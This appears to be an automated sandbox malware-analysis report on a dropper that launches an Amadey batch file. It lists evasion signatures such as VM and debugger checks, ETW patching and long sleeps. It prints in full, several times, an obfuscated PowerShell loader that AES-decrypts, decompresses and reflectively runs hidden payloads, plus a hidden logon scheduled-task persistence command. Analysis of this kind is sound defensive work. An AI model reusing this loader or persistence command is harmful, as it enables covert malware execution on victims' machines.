Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs .Net Code: Main contains sample name check
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4706
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5071
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7489
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2171
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7521
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2048
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3659
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3368
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172 Thread sleep count: 4706 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172 Thread sleep count: 5071 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2892 Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5252 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6256 Thread sleep count: 7521 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6252 Thread sleep count: 2048 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6544 Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6008 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2780 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220 Thread sleep count: 3659 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220 Thread sleep count: 3368 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3936 Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1076 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5616 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A2BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_00A2BA94
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A3D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_00A3D420
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A4C508 FindFirstFileExA, 0_2_00A4C508
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A3F82F VirtualQuery,GetSystemInfo, 0_2_00A3F82F
Source: powershell.exe, 00000004.00000002.2095931954.0000000007550000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ld
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: wscript.exe, 00000007.00000003.2050241439.0000000002F2D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: wscript.exe, 00000007.00000003.2051343769.0000000002F39000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000005.00000002.2035279040.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000B.00000002.3308194663.0000000008780000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt
Source: wscript.exe, 00000008.00000002.2067544754.000001CE38611000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: jcgLYlM4dg.exe, 00000000.00000002.2124170830.0000000003183000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 0000000B.00000002.3308194663.0000000008780000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3308194663.0000000008770000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.2035279040.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000005.00000002.2036156838.00000000049CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A40A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A40A0A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A491B0 mov eax, dword ptr fs:[00000030h] 0_2_00A491B0
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A4D1F0 GetProcessHeap, 0_2_00A4D1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A40B9D SetUnhandledExceptionFilter, 0_2_00A40B9D
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A40D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00A40D8A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A44FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00A44FEF

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi32_6640.amsi.csv, type: OTHER
Source: Yara match File source: amsi32_2636.amsi.csv, type: OTHER
Source: Yara match File source: amsi32_576.amsi.csv, type: OTHER
Source: 4.2.powershell.exe.9b90738.4.raw.unpack, Program.cs Reference to suspicious API methods: VirtualProtect(intPtr, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Reference to suspicious API methods: LoadLibrary("ntdll.dll")
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_958.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
